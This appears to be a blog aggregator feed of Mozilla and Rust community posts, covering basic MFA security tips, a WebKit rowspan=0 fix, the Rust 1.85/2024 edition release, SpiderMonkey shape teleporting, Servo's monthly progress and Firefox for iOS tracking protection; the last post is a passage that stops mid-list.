Tantek ÇelikCSF_01: Three Steps for IndieWeb Cybersecurity

Welcome to my first Cybersecurity Friday (CSF) post. Almost exactly one week ago I experienced (and had to fight & recover from) a cybersecurity incident. While that’s a much longer story, this post series is focused on sharing tips and incident learnings from an #indieweb-centric perspective.

Steps for Cybersecurity

Here are the top three steps in order of importance, that you should take ASAP to secure your online presence.

  1. Email MFA/2FA. Add multi-factor authentication (MFA) using an actual Authenticator application to all places where you store or check email. Some services call this second factor or two factor authentication (2FA). While checking your email security settings, verify recovery settings: Do not cross-link your emails as recovery methods for each other, and do not use a mobile/cell number for recovery at all.
  2. Domain Registrar MFA. Add MFA to your Domain Registrar(s) if you have any. Optionally disable password reset emails if possible (some registrars may allow this).
  3. Web Host MFA. Add MFA to your web hosting service(s) if you have any. This includes both website hosting and any content delivery network (CDN) services you are using for your domains.

Do not use a mobile number for MFA, nor a physical/hardware key if you travel internationally. There are very good reasons to avoid doing so. I’ll blog the reasons in another post.

Those are my top three recommended cybersecurity steps for protecting your internet presence. That’s it for this week. These are the bare minimum steps to take. There are many more steps you can take to strengthen your personal cybersecurity. I will leave you with this for now:

Entropy is your friend in security.

Glossary

Glossary for various terms, phrases, and further reading on each.

content delivery network
https://indieweb.org/content_delivery_network
cybersecurity
https://en.wikipedia.org/wiki/cybersecurity
domain registrar
https://indieweb.org/domain_registrar
email recovery
A method for recovering a service account password via the email account associated with that account. See also: https://en.wikipedia.org/wiki/Password_notification_email
entropy
https://en.wikipedia.org/wiki/Entropy_(information_theory)
MFA / 2FA
https://indieweb.org/multi-factor_authentication sometimes called Two Factor Authentication or Second Factor Authentication
mobile number for MFA
https://indieweb.org/SMS#Criticism
web host
https://indieweb.org/web_hosting

Syndicated to: IndieNews

Karl DubostFixing rowspan=0 on tables on WebKit.

stacked tables and chairs in the street.

Last week, I mentioned there were easy ways to fix or help the WebKit project.

Find The Bug

In January, looking at the FIXME: mentions on the WebKit project, I found this piece of code:

unsigned HTMLTableCellElement::rowSpan() const
{
    // FIXME: a rowSpan equal to 0 should be allowed, and mean that the cell is to span all the remaining rows in the row group.
    return std::max(1u, rowSpanForBindings());
}

Searching on bugs.webkit.org, I found this bug opened by Simon Fraser on May 5, 2018: rowspan="0" results in different table layout than Firefox/Chrome. Would I be able to solve it?

Test The Bug

The first task is very simple. Understand what are the different renderings in between browsers.

Simon had already created a testcase and Ahmad had created a screenshot for it showing the results of the testcase in Safari, Firefox and Chrome. This work was already done. If they had been missing, that would have been my first step.

Read The Specification

For having a better understanding of the issue, it is useful to read the specification related to this bug. In this case, the relevant information was in the HTML specification, where rowspan attribute on td/th elements is described. This is the text we need:

The td and th elements may also have a rowspan content attribute specified, whose value must be a valid non-negative integer less than or equal to 65534. For this attribute, the value zero means that the cell is to span all the remaining rows in the row group.

Create More Tests

Let's take a normal simple table which is 3 by 3.

<table border="1">
  <tr><td>A1</td><td>B1</td><td>C1</td></tr>
  <tr><td>A2</td><td>B2</td><td>C2</td></tr>
  <tr><td>A3</td><td>B3</td><td>C3</td></tr>
</table>

We might want to make the first cell overlapping the 3 rows of the tables. A way to do that is to set rowspan="3" because there are 3 rows.

<table border="1">
  <tr><td rowspand="3">A1</td><td>B1</td><td>C1</td></tr>
  <tr>                        <td>B2</td><td>C2</td></tr>
  <tr>                        <td>B3</td><td>C3</td></tr>
</table>

This will create a table were the first column will overlap the 3 rows. This is already working as expected in all rendering engines : WebKit, Gecko and Blink. So far, so good.

Think About The Logic

I learned from reading the specification that rowspan had a maximum value: 65534.

My initial train of thoughts was:

  1. compute the number of rows the table.
  2. parse the value rowspan value
  3. when the value is 0, replace it with the number of rows.

It seemed too convoluted. Would it be possible to use the maximum value for rowspan? The specification was saying "span all the remaining rows in the row group".

I experimented with a bigger rowspan value than the number of rows. For example, put the value 30 on a 3 rows table.

<table border="1">
  <tr><td rowspand="30">A1</td><td>B1</td><td>C1</td></tr>
  <tr>                         <td>B2</td><td>C2</td></tr>
  <tr>                         <td>B3</td><td>C3</td></tr>
</table>

I checked in Firefox, Chrome, and Safari. I got the same rendering. We were on the right track. Let's use the maximum value for rowspan.

I made a test case with additional examples to be able to check in different browsers the behavior:

Rendering of the table bug in Safari.

Fixing The Code

We just had to try to change the C++ code. My patch was

diff --git a/Source/WebCore/html/HTMLTableCellElement.cpp b/Source/WebCore/html/HTMLTableCellElement.cpp
index 256c816acc37b..65450c01e369a 100644
--- a/Source/WebCore/html/HTMLTableCellElement.cpp
+++ b/Source/WebCore/html/HTMLTableCellElement.cpp
@@ -59,8 +59,14 @@ unsigned HTMLTableCellElement::colSpan() const

 unsigned HTMLTableCellElement::rowSpan() const
 {
-    // FIXME: a rowSpan equal to 0 should be allowed, and mean that the cell is to span all the remaining rows in the row group.
-    return std::max(1u, rowSpanForBindings());
+    unsigned rowSpanValue = rowSpanForBindings();
+    // when rowspan=0, the HTML spec says it should apply to the full remaining rows.
+    // In https://html.spec.whatwg.org/multipage/tables.html#attr-tdth-rowspan
+    // > For this attribute, the value zero means that the cell is
+    // > to span all the remaining rows in the row group.
+    if (!rowSpanValue)
+        return maxRowspan;
+    return std::max(1u, rowSpanValue);
 }

 unsigned HTMLTableCellElement::rowSpanForBindings() const

If rowspan was 0, just give the maximum value which is defined in HTMLTableCellElement.h.

I compiled the code change and verified the results:

Rendering of the table bug in Safari but this time fixed.

(note for the careful reader the last table legend is wrong, it should be rowspan="3")

This was fixed! A couple of tests needed to be rebaselined. I was ready to send a Pull Request for this bug.

What Is Next?

The fix is not yet available on the current version of Safari, but you can experiment it with Safari Technology Preview (STP 213 Release Notes).

The biggest part of fixing the bugs is researching, testing different HTML scenario without even touching the C++ code, etc. I'm not a C++ programmer, but time to time I can find bugs that are easy enough to understand that I can fix them. I hope this makes it easier for you to understand and encourage you to look at other bugs.

Note also, that it is not always necessary to fix until modifying everything. Sometimes, just creating testscases, screenshots, pointing to the right places in the specifications, creating the WPT test cases covering this bug are all super useful.

PS: Doing all this work, I found also about the behavior of colspan which is interoperable (same behavior in all browsers), but which I find illogical comparing to the behavior of rowspan.

Otsukare!

Niko MatsakisRust 2024 Is Coming

So, a little bird told me that Rust 2024 is going to become stable today, along with Rust 1.85.0. In honor of this momentous event, I have penned a little ditty that I’d like to share with you all. Unfortunately, for those of you who remember Rust 2021’s “Edition: The song”, in the 3 years between Rust 2021 and now, my daughter has realized that her father is deeply uncool1 and so I had to take this one on solo2. Anyway, enjoy! Or, you know, suffer. As the case may be.

Video

Watch the movie embedded here, or watch it on YouTube:

Lyrics

In ChordPro format, for those of you who are inspired to play along.

{title: Rust 2024}
{subtitle: }

{key: C}

[Verse 1]
[C] When I got functions that never return
I write an exclamation point [G]
But use it for an error that could never be
the compiler [C] will yell at me

[Verse 2]
[C] We Rust designers, we want that too
[C7] But we had to make a [F] change
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Bridge]
[Am] ... [Am] But will my program [E] build?
[Am] Yes ... oh that’s [D7] for sure
[F] edi-tions [G] are [C] opt in

[Verse 3]
[C] Usually when I return an `impl Trait`
everything works out fine [G]
but sometimes I need a tick underscore
and I don’t really [C] know what that’s for

[Verse 4]
[C] We Rust designers we do agree
[C7] That was con- [F] fusing 
[F] But that will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Bridge 2]
[Am] Cargo fix will make the changes
automatically [G] Oh that sure sounds great...
[Am] but wait... [Am] my de-pen-denc-[E]-ies
[Am] Don’t worry e-[D7]ditions
[F] inter [G] oper [C] ate

[Verse 5]
[C] Whenever I match on an ampersand T
The borrow [G] propagates
But where do I put the ampersand
when I want to [C] copy again?

[Verse 6]
[C] We Rust designers, we do agree
[C7] That really had to [F] change
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Outro]
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

One more time!

[Half speed]
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

  1. It was bound to happen eventually. ↩︎

  2. Actually, I had a plan to make this a duet with somebody who shall remain nameless (they know who they are). But I was too lame to get everything done on time. In fact, I may or may not have realized “Oh, shit, I need to finish this recording!” while in the midst of a beer with Florian Gilcher last night. Anyway, sorry, would-be-collaborator-I -was-really-looking-forward-to-playing-with! Next time! ↩︎

The Rust Programming Language BlogAnnouncing Rust 1.85.0 and Rust 2024

The Rust team is happy to announce a new version of Rust, 1.85.0. This stabilizes the 2024 edition as well. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.85.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.85.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.85.0 stable

Rust 2024

We are excited to announce that the Rust 2024 Edition is now stable! Editions are a mechanism for opt-in changes that may otherwise pose a backwards compatibility risk. See the edition guide for details on how this is achieved, and detailed instructions on how to migrate.

This is the largest edition we have released. The edition guide contains detailed information about each change, but as a summary, here are all the changes:

Migrating to 2024

The guide includes migration instructions for all new features, and in general transitioning an existing project to a new edition. In many cases cargo fix can automate the necessary changes. You may even find that no changes in your code are needed at all for 2024!

Note that automatic fixes via cargo fix are very conservative to avoid ever changing the semantics of your code. In many cases you may wish to keep your code the same and use the new semantics of Rust 2024; for instance, continuing to use the expr macro matcher, and ignoring the conversions of conditionals because you want the new 2024 drop order semantics. The result of cargo fix should not be considered a recommendation, just a conservative conversion that preserves behavior.

Many people came together to create this edition. We'd like to thank them all for their hard work!

async closures

Rust now supports asynchronous closures like async || {} which return futures when called. This works like an async fn which can also capture values from the local environment, just like the difference between regular closures and functions. This also comes with 3 analogous traits in the standard library prelude: AsyncFn, AsyncFnMut, and AsyncFnOnce.

In some cases, you could already approximate this with a regular closure and an asynchronous block, like || async {}. However, the future returned by such an inner block is not able to borrow from the closure captures, but this does work with async closures:

let mut vec: Vec<String> = vec![];

let closure = async || {
    vec.push(ready(String::from("")).await);
};

It also has not been possible to properly express higher-ranked function signatures with the Fn traits returning a Future, but you can write this with the AsyncFn traits:

use core::future::Future;
async fn f<Fut>(_: impl for<'a> Fn(&'a u8) -> Fut)
where
    Fut: Future<Output = ()>,
{ todo!() }

async fn f2(_: impl for<'a> AsyncFn(&'a u8))
{ todo!() }

async fn main() {
    async fn g(_: &u8) { todo!() }
    f(g).await;
    //~^ ERROR mismatched types
    //~| ERROR one type is more general than the other

    f2(g).await; // ok!
}

So async closures provide first-class solutions to both of these problems! See RFC 3668 and the stabilization report for more details.

Hiding trait implementations from diagnostics

The new #[diagnostic::do_not_recommend] attribute is a hint to the compiler to not show the annotated trait implementation as part of a diagnostic message. For library authors, this is a way to keep the compiler from making suggestions that may be unhelpful or misleading. For example:

pub trait Foo {}
pub trait Bar {}

impl<T: Foo> Bar for T {}

struct MyType;

fn main() {
    let _object: &dyn Bar = &MyType;
}
error[E0277]: the trait bound `MyType: Bar` is not satisfied
 --> src/main.rs:9:29
  |
9 |     let _object: &dyn Bar = &MyType;
  |                             ^^^^ the trait `Foo` is not implemented for `MyType`
  |
note: required for `MyType` to implement `Bar`
 --> src/main.rs:4:14
  |
4 | impl<T: Foo> Bar for T {}
  |         ---  ^^^     ^
  |         |
  |         unsatisfied trait bound introduced here
  = note: required for the cast from `&MyType` to `&dyn Bar`

For some APIs, it might make good sense for you to implement Foo, and get Bar indirectly by that blanket implementation. For others, it might be expected that most users should implement Bar directly, so that Foo suggestion is a red herring. In that case, adding the diagnostic hint will change the error message like so:

#[diagnostic::do_not_recommend]
impl<T: Foo> Bar for T {}
error[E0277]: the trait bound `MyType: Bar` is not satisfied
  --> src/main.rs:10:29
   |
10 |     let _object: &dyn Bar = &MyType;
   |                             ^^^^ the trait `Bar` is not implemented for `MyType`
   |
   = note: required for the cast from `&MyType` to `&dyn Bar`

See RFC 2397 for the original motivation, and the current reference for more details.

FromIterator and Extend for tuples

Earlier versions of Rust implemented convenience traits for iterators of (T, U) tuple pairs to behave like Iterator::unzip, with Extend in 1.56 and FromIterator in 1.79. These have now been extended to more tuple lengths, from singleton (T,) through to 12 items long, (T1, T2, .., T11, T12). For example, you can now use collect() to fanout into multiple collections at once:

use std::collections::{LinkedList, VecDeque};
fn main() {
    let (squares, cubes, tesseracts): (Vec<_>, VecDeque<_>, LinkedList<_>) =
        (0i32..10).map(|i| (i * i, i.pow(3), i.pow(4))).collect();
    println!("{squares:?}");
    println!("{cubes:?}");
    println!("{tesseracts:?}");
}
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
[0, 1, 8, 27, 64, 125, 216, 343, 512, 729]
[0, 1, 16, 81, 256, 625, 1296, 2401, 4096, 6561]

Updates to std::env::home_dir()

std::env::home_dir() has been deprecated for years, because it can give surprising results in some Windows configurations if the HOME environment variable is set (which is not the normal configuration on Windows). We had previously avoided changing its behavior, out of concern for compatibility with code depending on this non-standard configuration. Given how long this function has been deprecated, we're now updating its behavior as a bug fix, and a subsequent release will remove the deprecation for this function.

Stabilized APIs

These APIs are now stable in const contexts

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.85.0

Many people came together to create Rust 1.85.0. We couldn't have done it without all of you. Thanks!

The Mozilla BlogGrowing Mozilla — and evolving our leadership

Since 2022, Mozilla has been in an active process evolving what we do – and renewing our leadership. Today we announced several updates on the leadership piece of this ongoing work. 

We’ve recognized that Mozilla faces major headwinds in terms of both financial growth and mission impact. While Firefox remains the core of what we do, we also need to take steps to diversify: investing in privacy-respecting advertising to grow new revenue in the near term; developing trustworthy, open source AI to ensure technical and product relevance in the mid term; and creating online fundraising campaigns that will draw a bigger circle of supporters over the long run. Mozilla’s impact and survival depend on us simultaneously strengthening Firefox AND finding new sources of revenue AND manifesting our mission in fresh ways. That is why we’re working hard on all of these fronts.

We’ve also moved aggressively to attract new leadership and talent to Mozilla. This includes major growth in our Boards, with 40% new Board members since we began our efforts to evolve and grow back in 2022. We’ve also been bringing in new executive talent, including a new MoFo Executive Director and a Managing Partner for Mozilla Ventures. By the end of the year, we hope to have new, permanent CEOs for both MoCo and Mozilla.ai. 

Today we shared two updates as we continue to push forward with this renewal at the leadership level:

1. Mozilla Leadership Council: 

We are creating a Mozilla Leadership Council composed of the top executive from each of Mozilla’s organizations. This includes: Jane Silber (Mozilla.ai), Laura Chambers (Mozilla Corporation), Mohamed Nanabhay (Mozilla Ventures), Nabiha Syed (Mozilla Foundation), Ryan Sipes (MZLA/Thunderbird) and myself. I will act as chair. The purpose of this group is to better coordinate work across our organizations to make sure that Mozilla is more than the sum of its parts. 

2. New Board Chairs: 

Mozilla has built a strong cadre of 16 directors across all of our Boards, bringing an incredible breadth of experience and a commitment to supporting Mozilla in doing the hard and important work ahead. Today we are announcing three new Board chairs: 

  • The new Mozilla Foundation Board Chair is Nicole Wong. Nicole is a respected cross-sector privacy and policy expert and innovator, with leadership roles at Google and Twitter/X, service as Deputy U.S. Chief Technology Officer and positions on multiple corporate and non-profit boards. Nicole has been on Mozilla Foundation’s Board for 8 years. 
  • Kerry Cooper will chair Mozilla Corporation. One of the world’s most respected CMO’s and consumer executives, Kerry has held C-Suite roles at Walmart.com, Rothy’s, Choose Energy and more, and now serves on boards spanning venture, startups and AI innovation. Kerry has been on Mozilla Corporation’s Board for 2 years. 
  • Raffi Krikorian will chair Mozilla.ai. Raffi is a visionary technologist, engineer and leader, who was an early engineering leader at Twitter, headed Uber’s self-driving car lab, and is now CTO at the Emerson Collective where he works at the intersection of emerging technologies and social good. He brings three decades of thoughtful design and implementation within social media and artificial intelligence to Mozilla.

Each of these leaders reflects what I believe will be Mozilla’s ‘secret sauce’ in our next chapter: a mix of experience bridging business, technology and the public interest. Note that these appointments are now reflected on our leadership page

With these changes, Mitchell Baker ends her tenure as Chair and a member of Mozilla Foundation and Mozilla Corporation boards. In co-founding Mozilla, Mitchell built something truly unique and important — a global community and organization that showed how those with vision can shape the world and the future by building technology that puts the needs of humans and humanity first. We are extremely grateful to Mitchell for everything she has done for Mozilla and we are committed to continuing her legacy of fighting for a better future through better technology. I know these feelings are widely shared across Mozilla — we are incredibly appreciative to Mitchell for all that she has done.

As I have said many times over the last few years, Mozilla is entering a new chapter—one where we need to both defend what is good about the web and steer the technology and business models of the AI era in a better direction. I believe that we have the people—indeed, we ARE the people—to do this, and that there are millions around the world ready to help us. I am driven and excited by what lies ahead. 

The post Growing Mozilla — and evolving our leadership appeared first on The Mozilla Blog.

Spidermonkey Development BlogMaking Teleporting Smarter

Recently I got to land a patch which touches a cool optimization, that I had to really make sure I understood deeply. As a result, I wrote a huge commit message. I’d like to expand that message a touch here and turn it into a nice blog post.

This post assumes roughly that you understand how Shapes work in the JavaScript object model, and how prototypical property lookup works in JavaScript. If you don’t understand that just yet, this blog post by Matthias Bynens is a good start.

This patch aims to mitigate a performance cliff that occurs when we have applications which shadow properties on the prototype chain or which mutate the prototype chain.

The problem is that these actions currently break a property lookup optimization called “Shape Teleportation”.

What is Shape Teleporting?

Suppose you’re looking up some property y on an object obj, which has a prototype chain with 4 elements. Suppose y isn’t stored on obj, but instead is stored on some prototype object B, in slot 1.

A diagram of shape teleporting

In order to get the value of this property, officially you have to walk from obj up to B to find the value of y. Of course, this would be inefficient, so what we do instead is attach an inline cache to make this lookup more efficient.

Now we have to guard against future mutation when creating an inline cache. A basic version of a cache for this lookup might look like:

  • Check obj still has the same shape.
  • Check obj‘s prototype (D) still has the same shape.
  • Check D‘s prototype (C) still has the same shape
  • Check C’s prototype (B) still has the same shape.
  • Load slot 1 out of B.

This is less efficient than we would like though. Imagine if instead of having 3 intermediate prototypes, there were 13 or 30? You’d have this long chain of prototype shape checking, which takes a long time!

Ideally, what you’d like is to be able to simply say

  • Check obj still has the same shape.
  • Check B still has the same shape
  • Load slot 1 out of B.

The problem with doing this naively is “What if someone adds y as a property to C? With the faster guards, you’d totally miss that value, and as a result compute the wrong result. We don’t like wrong results.

Shape Teleporting is the existing optimization which says that so long as you actively force a change of shape on objects in the prototype chain when certain modifications occur, then you can guard in inline-caches only on the shape of the receiver object and the shape of the holder object.

By forcing each shape to be changed, inline caches which have baked in assumptions about these objects will no longer succeed, and we’ll take a slow path, potentially attaching a new IC if possible.

We must reshape in the following situations:

  • Adding a property to a prototype which shadows a property further up the prototype chain. In this circumstance, the object getting the new property will naturally reshape to account for the new property, but the old holder needs to be explicitly reshaped at this point, to avoid an inline cache jumping over the newly defined prototype.

A diagram of shape teleporting

  • Modifying the prototype of an object which exists on the prototype chain. For this case we need to invalidate the shape of the object being mutated (natural reshape due to changed prototype), as well as the shapes of all objects on the mutated object’s prototype chain. This is to invalidate all stubs which have teleported over the mutated object.

A diagram of shape teleporting

Furthermore, we must avoid an “A-B-A” problem, where an object returns to a shape prior to prototype modification: for example, even if we re-shape B, what if code deleted and then re-added y, causing B to take on its old shape? Then the IC would start working again, even though the prototype chain may have been mutated!

Prior to this patch, Watchtower watches for prototype mutation and shadowing, and marks the shapes of the prototype objects involved with these operations as InvalidatedTeleporting. This means that property access with the objects involved can never more rely on the shape teleporting optimization. This also avoids the A-B-A problem as new shapes will always carry along the InvalidatedTeleporting flag.

This patch instead chooses to migrate an object shape to dictionary mode, or generate a new dictionary shape if it’s already in dictionary mode. Using dictionary mode shapes works because all dictionary mode shapes are unique and never recycled. This ensures the ICs are no longer valid as expected, as well as handily avoiding the A-B-A problem.

The patch does keep the InvalidatedTeleporting flag to catch potentially ill-behaved sites that do lots of mutation and shadowing, avoiding having to reshape proto objects forever.

The patch also provides a preference to allow cross-comparison between old and new, however this patch defaults to dictionary mode teleportation.

Performance testing on micro-benchmarks shows large impact by allowing ICs to attach where they couldn’t before, however Speedometer3 shows no real movement.

This Week In RustThis Week in Rust 587

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is httpmock, which is quite unsurprisingly a HTTP mocking library for Rust.

Thanks to Jacob Pratt for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

498 pull requests were merged in the last week

Rust Compiler Performance Triage

This week's results were dominated by the update to LLVM 20 (#135763), which brought a large number of performance improvements, as usually. There were also two other significant improvements, caused by improving the representation of const values (#136593) and doing less work when formatting in rustdoc (#136828).

Triage done by @kobzol.

Revision range: c03c38d5..ce36a966

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
4.4% [0.2%, 35.8%] 10
Regressions ❌
(secondary)
1.2% [0.2%, 5.0%] 13
Improvements ✅
(primary)
-1.6% [-10.5%, -0.2%] 256
Improvements ✅
(secondary)
-1.0% [-4.7%, -0.2%] 163
All ❌✅ (primary) -1.3% [-10.5%, 35.8%] 266

3 Regressions, 2 Improvements, 4 Mixed; 4 of them in rollups 50 artifact comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-19 - 2025-03-19 🦀

Virtual
Asia
Europe
North America
Oceania
South America:

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I have found that many automated code review tools, including LLMs, catch 10 out of 3 bugs.

Josh Triplett on r/rust

Despite a lamentable lack of suggestions, llogiq is properly pleased with his choice.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Servo BlogThis month in Servo: new webview API, relative colors, canvas buffs, and more!

Servo now supports several new web API features:

We’ve landed a bunch of HTMLCanvasElement improvements:

servoshell nightly showing relative oklch() colors, canvas toDataURL() with image/jpeg and image/webp, canvas toBlob(), the WGSLLanguageFeatures API, and the DOM tree of a custom element with a <slot>

Streams are a lot more useful now, with ReadableStreamBYOBReader now supporting read() (@Taym95, #35040), cancel(), close(), and releaseLock() (@Taym95, #34958).

Servo now passes 40.6% (+7.5pp) of enabled Shadow DOM tests, thanks to our landing support for the :host selector (@simonwuelker, #34870) and the <slot> element (@simonwuelker, #35013, #35177, #35191, #35221, #35137, #35222), plus improvements to event handling (@simonwuelker, #34788, #34884), script (@willypuzzle, #34787), style (@simonwuelker, @jdm, #35198, #35132), and the DOM tree (@simonwuelker, @Taym95, #34803, #34834, #34863, #34909, #35076).

Table layout is significantly better now, particularly in ‘table-layout: fixed’ (@Loirooriol, #35170), table sizing (@Loirooriol, @mrobinson, #34889, #34947, #35167), rowspan sizing (@mrobinson, @Loirooriol, #35095), interaction with floats (@Loirooriol, #35207), and ‘border-collapse’ layout (@Loirooriol, #34932, #34908, #35097, #35122, #35165) and painting (@Loirooriol, #34933, #35003, #35100, #35075, #35129, #35163).

As a result, Servo now passes 90.2% (+11.5pp) of enabled CSS tables tests, and of the tests that are in CSS 2, we now pass more than Blink and WebKit! We literally stood on the shoulders of giants here, because this would not have been possible without Blink’s robust table impl. Despite their age, tables are surprisingly underspecified, so we also needed to report several spec issues along the way (@Loirooriol).

Embedding

Servo aims to be an embeddable web engine, but so far it’s been a lot harder to embed Servo than it should be.

For one, configuring and starting Servo is complicated. We found that getting Servo running at all, even without wiring up input or handling resizes correctly, took over 200 lines of Rust code (@delan, @mrobinson, #35118). Embedders (apps) could only control Servo by sending and receiving a variety of “messages” and “events”, and simple questions like “what’s the current URL?” were impossible to answer without keeping track of extra state in the app.

Contrast this with WebKitGTK, where you can write a minimal kiosk app with a fully-functional webview in under 50 lines of C. To close that gap, we’ve started reworking our embedding API towards something more idiomatic and ergonomic, starting with the concept embedders care about most: the webview.

Our new webview API is controlled by calling methods on a WebView handle (@delan, @mrobinson, #35119, #35183, #35192), including navigation and user input. Handles will eventually represent the lifecycle of the webview itself; if you have one, the webview is valid, and if you drop them, the webview is destroyed.

Servo needs to call into the embedder too, and here we’ve started replacing the old EmbedderMsg API with a webview delegate (@delan, @mrobinson, #35211), much like the delegates in Apple’s WebKit API. In Rust, a delegate is a trait that the embedder can install its own impl for. Stay tuned for more on this next month!

Embedders can now intercept any request, not just navigation (@zhuhaichao518, #34961), and you can now identify the webview that caused an HTTP credentials prompt (@pewsheen, @mrobinson, #34808).

Other embedding improvements include:

Other changes

We’ve reworked Servo’s preferences system, making all prefs optional with reasonable defaults (@mrobinson, #34966, #34999, #34994). As a result:

  • The names of all preferences have changed; see the Prefs docs for a list
  • Embedders no longer need a prefs.json resource to get Servo running
  • Some debug options were converted to preferences (@mrobinson, #34998)

Devtools now highlights console.log() arguments according to their types (@simonwuelker, #34810).

Servo’s networking is more efficient now, with the ability to cancel fetches for navigation that contain redirects (@mrobinson, #34919) and cancel fetches for <video> and <media> when the document is unloaded (@mrobinson, #34883). Those changes also eliminate per-request IPC channels for navigation and cancellation respectively, and in the same vein, we’ve eliminated them for image loading too (@mrobinson, #35041).

We’ve continued splitting up our massive script crate (@jdm, #34359, #35157, #35169, #35172), which will eventually make Servo much faster to build.

A few crashes have been fixed, including when exiting Servo (@mukilan, #34917), when using the internal memory profiler (@jdm, #35058), and when running ResizeObserver callbacks (@willypuzzle, #35168).

For developers

We now run CI smoketests on OpenHarmony using a real device (@jschwe, @mukilan, #35006), increasing confidence in your changes beyond compile-time errors.

We’ve also tripled our self-hosted CI runner capacity (@delan, #34983, #35002), making concurrent Windows and macOS builds possible without falling back to the much slower GitHub-hosted runners.

Servo can’t yet run WebDriver-based tests on wpt.fyi, wpt.servo.org, or CI, because the servo executor for the Web Platform Tests does not support testdriver.js. servodriver does, though, so we’ve started fixing test regressions with that executor with the goal of eventually switching to it (@jdm, #34957, #34997).

Donations

Thanks again for your generous support! We are now receiving 3835 USD/month (−11.4% over December) in recurring donations. With this money, we’ve been able to expand our capacity for self-hosted CI runners on Windows, Linux, and macOS builds, halving mach try build times from over an hour to under 30 minutes!

Servo is also on thanks.dev, and already 21 GitHub users (+5 over December) that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.

3835 USD/month
10000

As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

Conference talks

The Mozilla BlogSpring detox with Firefox for iOS

A hand holding a smartphone with a blooming flower growing from the screen, surrounded by sparkles, against an orange gradient background.

A fresh start isn’t just for your home — your iPhone or iPad deserves a privacy detox too. With Firefox for iOS, you can block hidden trackers, stop fingerprinting, and keep your browsing history more private with Enhanced Tracking Protection.

How Firefox for iOS protects you

Websites and advertisers often track your activity using cookies, fingerprinting and redirect trackers. Firefox’s Enhanced Tracking Protection helps detox your browsing experience by blocking these trackers, keeping your personal data safe from prying eyes.

Learn more about how Enhanced Tracking Protection works in this FAQ.

Privacy features built for iOS

✅ Blocks Social Media Trackers – Prevents social media platforms from monitoring your activity across different sites.
✅ Prevents Cross-Site Tracking – Stops advertisers from following your movements from one site to another.
✅ Blocks Cryptominers and Fingerprinters – Protects your device from unauthorized cryptocurrency mining and digital fingerprinting attempts.
✅ Customizable Protection Levels – Choose between Standard and Strict modes to balance protection and site functionality.
✅ Private Browsing Mode – Browse without saving history, cookies, or site data, ensuring your sessions remain confidential.
✅ Sync Across Devices – Use Firefox on your iPhone, iPad, and desktop while keeping your privacy settings intact.

How to check your privacy settings on Firefox for iOS

Make sure you’re getting the best privacy protection by following these steps on your iPhone or iPad:

  1. Open the Firefox app.
  2. Tap the menu (☰) button at the bottom of the screen.
  3. Select Settings, then tap Tracking Protection.
  4. Choose your desired protection level:
    • Standard: Blocks social media trackers, cross-site trackers, cryptominers, and fingerprinters.
